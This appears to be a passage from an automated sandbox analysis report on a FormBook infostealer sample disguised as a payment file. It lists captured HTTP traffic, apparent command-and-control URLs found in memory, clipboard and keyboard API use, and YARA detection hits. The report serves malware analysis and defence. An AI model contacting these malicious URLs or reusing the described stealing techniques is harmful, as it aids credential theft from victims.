b0 42 53 51 5f 42 d0 6b 34 6b 58 c7 5a 5a 0b 5a 32 54 51 34 dc 8c 75 4c 31 54 cb 6d 4f 28 c5 54 45 b1 b6 50 db 5b 80 2d 3d 2d e4 07 dd d5 df 76 36 ae 16 67 57 8b d3 b7 ed a9 fb 76 6e 8b f5 2f 83 20 70 86 06 dc 6c af 3b 78 c7 cd 66 ed 1b eb ce cd b9 c2 d3 01 b6 f8 24 22 f9 22 8e 1f 8b a8 58 3f 07 52 26 4a 44 05 0e 4d bb 24 75 76 76 8a 72 0a eb 10 e9 22 31 93 d2 b7 f1 8e b4 85 4c 4b a2 29 a4 21 a9 4b 09 87 5b 4e 24 4c 84 24 8b 76 a9 48 92 2d 4b 4a 10 9d 06 61 27 b2 88 86 44 0d eb a2 6c 59 02 30 91 1a 15 3c 22 2b 85 90 3f 09 af 46 9f d5 89 0d 64 06 db c4 56 b1 f5 05 f4 ed 1d 00 3c d0 a2 02 45 17 a8 e4 71 fe 6e 83 74 62 6a 50 c5 df 22 df 12 e9 7f a4 da fb 2e 03 f0 51 26 1a 16 5b c4 b6 92 7a 4b 36 b1 41 81 65 ca f5 c4 5b 5d 16 45 9a e4 13 4b 67 cf a7 91 d9 15 6c e1 62 3c b1 67 ad 1a 8b cf c2 0c f4 49 85 58 a4 c4 74 54 5d df c6 55 92 34 52 c6 eb d4 21 77 f0 2c d2 71 d6 ea 80 8a 22 1a 29 e3 Data Ascii: a5eYySGW;tfSTp")R;ZCfZR30qJ1G|`l;9?3[=#kJho"o)D])"'jB i!4|_PCQDLd@&:E:(~]FOLTWUTHIf9eE{AP**(e$TXY#q<:bjBSQ_Bk4kXZZZ2TQ4uL1TmO(TEP[-=-v6gWvn/ pl;xf$""X?R&JDM$uvvr"1LK)!K[N$L$vH-KJa'DlY0<"+?FdV<EqntbjP".Q&[zK6Ae[]EKglb<gIXtT]U4R!w,q")
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Sep 2024 14:20:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingProduct: Z-BlogPHP 1.7.3X-XSS-Protection: 1; mode=blockCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=etHMhN214ihAwot1ehHbqV6GKyOUw1THI9%2BG9nPgSIz%2BduB%2FseIQSZLZXJeWFZH3XJ8Q0V7fGyO7RziAKO2sz%2FdPpOnnrtKwh9cimGs9dQqrhOXmuRNGgR9vgp07mwwHgZE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c51fad5597119b6-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 61 35 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 59 79 53 1b 47 16 ff 1b 57 f9 3b 74 66 53 11 54 a1 19 09 70 0e 22 29 95 a4 52 d9 3b de c4 d9 da 5a af 43 b5 66 5a 52 db 33 d3 e3 99 96 30 71 a5 4a c4 80 91 31 47 7c 10 ce 60 6c 13 1c 3b 1c b6 c1 91 39 3f 8c d5 33 a3 bf f8 0a 5b 3d 23 09 09 8c b0 89 bd 6b 4a 68 d4 dd ef fc f5 eb d7 dd 6f 22 6f 29 44 a6 5d 06 02 29 aa a9 b1 e3 c7 22 95 27 82 0a 7f 6a 88 42 20 a7 a0 69 21 1a 15 d2 34 11 7c 5f a8 f4 eb 50 43 51 c1 44 ba 82 4c 64 0a 40 26 3a 45 3a 8d 0a 9d 28 7e 0e d3 5d c2 14 a5 46 10 9d 4f e3 4c 54 f8 57 f0 eb 8f 83 9f 12 cd 80 14 c7 55 54 c5 f5 a7 cf a2 48 49 a2 66 39 65 12 0d 45 c3 7b 15 41 c3 50 b1 0c e3 2a 0a 2a 28 83 65 24 54 58 0d b9 59 23 71 ac a2 bd 3c 19 8c 3a 0d 62 d2 6a e3 b0 42 53 51 5f 42 d0 6b 34 6b 58 c7 5a 5a 0b 5a 32 54 51 34 dc 8c 75 4c 31 54 cb 6d 4f 28 c5 54 45 b1 b6 50 db 5b 80 2d 3d 2d e4 07 dd d5 df 76 36 ae 16 67 57 8b d3 b7 ed a9 fb 76 6e 8b f5 2f 83 20 70 86 06 dc 6c af 3b 78 c7 cd 66 ed 1b eb ce cd b9 c2 d3 01 b6 f8 24 22 f9 22 8e 1f 8b a8 58 3f 07 52 26 4a 44 05 0e 4d bb 24 75 76 76 8a 72 0a eb 10 e9 22 31 93 d2 b7 f1 8e b4 85 4c 4b a2 29 a4 21 a9 4b 09 87 5b 4e 24 4c 84 24 8b 76 a9 48 92 2d 4b 4a 10 9d 06 61 27 b2 88 86 44 0d eb a2 6c 59 02 30 91 1a 15 3c 22 2b 85 90 3f 09 af 46 9f d5 89 0d 64 06 db c4 56 b1 f5 05 f4 ed 1d 00 3c d0 a2 02 45 17 a8 e4 71 fe 6e 83 74 62 6a 50 c5 df 22 df 12 e9 7f a4 da fb 2e 03 f0 51 26 1a 16 5b c4 b6 92 7a 4b 36 b1 41 81 65 ca f5 c4 5b 5d 16 45 9a e4 13 4b 67 cf a7 91 d9 15 6c e1 62 3c b1 67 ad 1a 8b cf c2 0c f4 49 85 58 a4 c4 74 54 5d df c6 55 92 34 52 c6 eb d4 21 77 f0 2c d2 71 d6 ea 80 8a 22 1a 29 e3 85 34 Data Ascii: a5eYySGW;tfSTp")R;ZCfZR30qJ1G|`l;9?3[=#kJho"o)D])"'jB i!4|_PCQDLd@&:E:(~]FOLTWUTHIf9eE{AP**(e$TXY#q<:bjBSQ_Bk4kXZZZ2TQ4uL1TmO(TEP[-=-v6gWvn/ pl;xf$""X?R&JDM$uvvr"1LK)!K[N$L$vH-KJa'DlY0<"+?FdV<EqntbjP".Q&[zK6Ae[]EKglb<gIXtT]U4R!w,q")4
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Sep 2024 14:21:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingProduct: Z-BlogPHP 1.7.3X-XSS-Protection: 1; mode=blockCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vYfRG4D1AXx1pQ8hcwLeUJhtixVuTUsut%2FfCYHLsG2pMLeVmDiFfMG9lKLwMZxcgVUWmWQAgZ4VK0V4BMxXlS28h1A%2F8w0pas86j%2BZJeRMO7CRY5575JOoodnOcxi9tx2ho%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c51fae56a0543b6-EWRalt-svc: h3=":443"; ma=86400Data Raw: 31 65 39 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 62 6c 65 2d 64 65 76 69 63 65 22 63 6f 6e 74 65 6e 74 3d 22 70 63 2c 6d 6f 62 69 6c 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 21 20 e5 af b9 e4 b8 8d e8 b5 b7 ef bc 8c e9 a1 b5 e9 9d a2 e6 9c aa e6 89 be e5 88 b0 20 2d 20 e7 8e 8b e8 80 85 e8 8d a3 e8 80 80 e6 94 bb e7 95 a5 e4 b9 8b e5 ae b6 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 68 69 6e 61 65 6e 2e 6f 72 67 2f 7a 62 5f 75 73 65 72 73 2f 74 68 65 6d 65 2f 79 64 31 31 32 35 66 72 65 65 2f 73 74 79 6c 65 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 68 69 6e 61 65 6e 2e 6f 72 67 2f 7a 62 5f 75 73 65 72 73 2f 74 68 65 6d 65 2f 79 64 31 31 32 35 66 72 65 65 2f 73 74 79 6c 65 2f 63 73 73 2f 73 77 69 70 65 72 2d 34 2e Data Ascii: 1e97<!doctype html><html><head><meta charset="utf-8"><meta name="renderer" content="webkit"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta name="applicable-device"content="pc,mobile"><meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1"><title>404! - </title><link href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/font-awesome.min.css" rel="stylesheet"><link href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swiper-4.
            Source: XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/
            Source: XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/195.html
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/196.html
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/197.html
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/198.html
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/199.html
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/200.html
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/201.html
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/202.html
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/203.html
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/204.html
            Source: XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/search.php?act=search
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_system/login.php
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_system/script/c_html_js_add.php
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_system/script/jquery-2.2.4.min.js
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_system/script/zblogphp.js
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/script/common.js?v=1.2.4
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/script/custom.js?v=1.2.4
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/style/css/font-awesome.min.css
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/style/css/normalize.css
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swiper-4.3.3.min.css
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/style/images/logo.png
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/style/style.min.css?v=1.2.4
            Source: XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000003F0C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.nobartv6.website/pp43/?x0wHoJ8X=/yzCblrJsERuqgzzvpbFhEZXPrEdROgu
            Source: XXOIkqUXwzoOEy.exe, 00000006.00000002.4482452521.0000000004CDD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.study-in-nyc.online
            Source: XXOIkqUXwzoOEy.exe, 00000006.00000002.4482452521.0000000004CDD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.study-in-nyc.online/f1gw/
            Source: netbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000004.00000002.4479582993.00000000032CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000004.00000002.4479582993.00000000032CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000004.00000002.4479582993.00000000032CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000004.00000002.4479582993.00000000032CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033h
            Source: netbtugc.exe, 00000004.00000002.4479582993.00000000032CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000004.00000002.4479582993.00000000032CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000004.00000003.2521879053.00000000082A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000004.00000002.4481211759.0000000004C30000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.00000000035A0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=languagemodel.pro
            Source: netbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000045E8000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000002F58000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2631846308.0000000011598000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.elsupertodo.net/2jit/?x0wHoJ8X=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle
            Source: netbtugc.exe, 00000004.00000002.4481211759.0000000004C30000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.00000000035A0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
            Source: netbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.htmlit.com.cn/
            Source: netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.zblogcn.com/
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DEEA26 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00DEEA26
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DEEC91 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00DEEC91
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DEEA26 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00DEEA26
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DDA975 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00DDA975
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00E09468 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00E09468

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4479452466.0000000003220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4482452521.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4479040765.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4480467614.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2236251136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2237968521.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2238057070.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4480505595.0000000004270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4479452466.0000000003220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4482452521.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4479040765.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4480467614.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2236251136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2237968521.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2238057070.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4480505595.0000000004270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: This is a third-party compiled AutoIt script.0_2_00D7445D
            Source: PAGO $830.900.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: PAGO $830.900.exe, 00000000.00000000.2033213416.0000000000E32000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7b6f19a2-2
            Source: PAGO $830.900.exe, 00000000.00000000.2033213416.0000000000E32000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating 